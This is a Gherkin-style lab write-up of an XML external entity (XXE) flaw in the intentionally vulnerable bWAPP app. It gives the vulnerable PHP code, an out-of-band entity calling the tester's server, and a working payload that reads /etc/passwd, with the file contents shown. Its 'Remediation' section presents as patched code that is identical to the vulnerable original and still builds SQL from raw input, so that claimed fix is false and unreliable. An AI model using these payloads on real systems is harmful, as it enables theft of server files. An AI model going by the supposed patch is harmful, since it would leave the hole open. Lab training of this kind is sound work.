## Version 1.4.1
## language: en

Feature:
  TOE:
    bWAPP
  Category:
    Other bugs
  Location:
    http://bwapp/xxe-2.php - Request body
  CWE:
    CWE-611: Improper Restriction of XML External Entity Reference ('XXE')
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Exfiltrate data via XXE
  Recommendation:
    Disable external entities

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
    | beebox                | 1.6       |
  TOE information:
    Given I am running bWAPP on a beebox VM via VirtualBox on http://bwapp

  Scenario: Normal use case
    Given I go to bwapp/insecure_direct_object_ref_3.php
    And click on "reset your secret to any bugs?"
    Then my secret gets changed to "Any bugs?"

  Scenario: Static detection
  External Entities are not disabled
    When I look at the code in bwapp/xxe-2.php
    """
    24  $body = file_get_contents("php://input");
    25
    26  // If the security level is not MEDIUM or HIGH
    27  if($_COOKIE["security_level"] != "1"
        && $_COOKIE["security_level"] != "2")
    28  {
    29
    30  ini_set("display_errors",1);
    31
    32  $xml = simplexml_load_string($body);
    33
    34  // Debugging
    35  // print_r($xml);
    36
    37  $login = $xml->login;
    38  $secret = $xml->secret;
    39
    40  if($login && $login != "" && $secret)
    41  {
    42
    43      $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '"
            . $login . "'";
    44
    45      // Debugging
    46      // echo $sql;
    47
    48      $recordset = $link->query($sql);
    49
    50      if(!$recordset)
    51      {
    52
    53          die("Connect Error: " . $link->error);
    54
    55      }
    56
    57      $message = $login . "'s secret has been reset!";
    58
    59  }
    """
    Then I can see it just parses the XML request
    And doesn't disable external entities or sanitize the input in any way

  Scenario: Dynamic detection
  I can make requests on behalf of a logged in user from outside
    Given I intercept a POST request for the URL with BurpSuite
    And I see the request data
    """
    ...
    Cookie: security_level=0; PHPSESSID=1c91299fd7de2ace36aedd129d61611c
    <reset>
        <login>bee</login>
        <secret>Any bugs?</secret>
    </reset>
    """
    Then I forward it and get the response
    """
    bee's secret has been reset!
    """
    Then I notice it's reflecting the "user" parameter
    Then I try injecting an External Entity pointing to my server
    """
    ...
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE root [
    <!ENTITY bWAPP SYSTEM "http://192.168.56.1:9000">]>
    <reset>
      <login>bee</login>
      <secret>blah</secret>
    </reset>
    """
    Then I get a request in my webserver
    """
    ➜  bwappfluid git:(sgomezatfluid) python3 -m http.server 9000
    Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
    192.168.56.101 - - [11/Jan/2019 15:51:54] "GET / HTTP/1.0" 200 -
    """
    Then I know the system is vulnerable to XXE

  Scenario: Exploitation
  Getting /etc/passwd from the server
    Given I send a request with an XXE that reads "/etc/passwd"
    """
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE root [
    <!ENTITY a SYSTEM "file:///etc/passwd">]>
    <reset>
      <login>&a;</login>
      <secret>blah</secret>
    </reset>
    """
    Then I get the contents of "/etc/passwd" in the response
    """
    ...
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    ...
    """

  Scenario: Remediation
  Disable external entities
    Given the code is patched as follows
    """
    24  $body = file_get_contents("php://input");
    25
    26  // If the security level is not MEDIUM or HIGH
    27  if($_COOKIE["security_level"] != "1"
        && $_COOKIE["security_level"] != "2")
    28  {
    29
    30  ini_set("display_errors",1);
    31
    32  $xml = simplexml_load_string($body);
    33
    34  // Debugging
    35  // print_r($xml);
    36
    37  $login = $xml->login;
    38  $secret = $xml->secret;
    39
    40  if($login && $login != "" && $secret)
    41  {
    42
    43      $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '"
            . $login . "'";
    44
    45      // Debugging
    46      // echo $sql;
    47
    48      $recordset = $link->query($sql);
    49
    50      if(!$recordset)
    51      {
    52
    53          die("Connect Error: " . $link->error);
    54
    55      }
    56
    57      $message = $login . "'s secret has been reset!";
    58
    59  }
    """
    Then external entities don't work anymore
    Then the vulnerability is patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.9/10 (Critical) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.2/10 (Critical) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.2/10 (Critical) - CR:M/IR:M/AR:M

  Scenario: Correlations
    systems/bwapp/0933-dos-xml-bomb
      Given I send an XXE with an XML expansion bomb
      Then I can DoS the server
      And bring it down
